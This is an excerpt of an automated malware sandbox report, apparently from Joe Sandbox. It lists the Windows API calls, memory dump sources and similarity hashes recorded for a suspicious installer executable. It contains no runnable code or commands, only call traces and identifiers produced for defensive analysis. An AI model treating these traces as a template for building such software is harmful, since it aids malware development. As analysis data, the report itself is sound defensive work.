                                                • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                  • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                  • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                  • Part of subcall function 004065EC: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                • Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
                                                • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                • Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
                                                • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                • Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
                                                • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                • Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                  • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: FilePointerwsprintf
                                                • String ID:
                                                • API String ID: 327478801-0
                                                • Opcode ID: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                • Instruction ID: 338d2460217d73ea2e2bb91e7847e27d4a9cf2f97daf1e2edf82c438741940a9
                                                • Opcode Fuzzy Hash: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                • Instruction Fuzzy Hash: 83E09271B00104AFDB11EBA5AE498AE7779DB80314B24403BF101F50D2CA794E119E2D
                                                APIs
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWrite
                                                • String ID:
                                                • API String ID: 390214022-0
                                                • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                APIs
                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                • Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
                                                • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                • Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679
                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                • Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
                                                • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                • Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9
                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                • Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
                                                • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                • Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8
                                                APIs
                                                • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                 • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                 • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                 • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                APIs
                                                • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: PrivateProfileString
                                                • String ID:
                                                • API String ID: 1096422788-0
                                                • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,0040617D,0042C228,00000000,?,?,Call,?), ref: 00406113
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                • Instruction ID: 3f4f51c5761301f24834a255f16e5381e59d2a113ab40b24d84d285923e9a67b
                                                • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                • Instruction Fuzzy Hash: 47D0173604020DBBEF119F90ED01FAB3B6DAB08314F014826FE16A80A2D776D530AB68
                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                APIs
                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                APIs
                                                • ShellExecuteExW.SHELL32(?), ref: 004058B9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID:
                                                • API String ID: 587946157-0
                                                • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                APIs
                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                  • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                  • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                  • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                  • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                  • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                  • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                  • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                • String ID:
                                                • API String ID: 2972824698-0
                                                • Opcode ID: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                • Instruction ID: 0c3abe8747980e4b1c062509ec269ea7acbc1ace6387f940061889d1bd78c20b
                                                • Opcode Fuzzy Hash: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                • Instruction Fuzzy Hash: F5F09032905115DBCB20FFA19D848DE62A49F01368B25057FF102F61D1C77C0E459AAE
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                • GetClientRect.USER32(?,?), ref: 004054CF
                                                • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                • ShowWindow.USER32(?,00000008), ref: 00405572
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                  • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                • CloseHandle.KERNEL32(00000000), ref: 004055FA
                                                • ShowWindow.USER32(00000000), ref: 0040561E
                                                • ShowWindow.USER32(?,00000008), ref: 00405623
                                                • ShowWindow.USER32(00000008), ref: 0040566D
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                • CreatePopupMenu.USER32 ref: 004056B2
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                • GetWindowRect.USER32(?,?), ref: 004056E6
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                • OpenClipboard.USER32(00000000), ref: 00405747
                                                • EmptyClipboard.USER32 ref: 0040574D
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                • CloseClipboard.USER32 ref: 004057A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 590372296-366298937
                                                • Opcode ID: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                • Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
                                                • Opcode Fuzzy Hash: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                • Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404735
                                                • SetWindowTextW.USER32(00000000,?), ref: 0040475F
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404810
                                                • CoTaskMemFree.OLE32(00000000), ref: 0040481B
                                                • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 0040484D
                                                • lstrcatW.KERNEL32(?,Call), ref: 00404859
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040486B
                                                  • Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB
                                                  • Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                  • Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                  • Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                  • Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                  • Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                  • Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
                                                  • Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                Strings
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
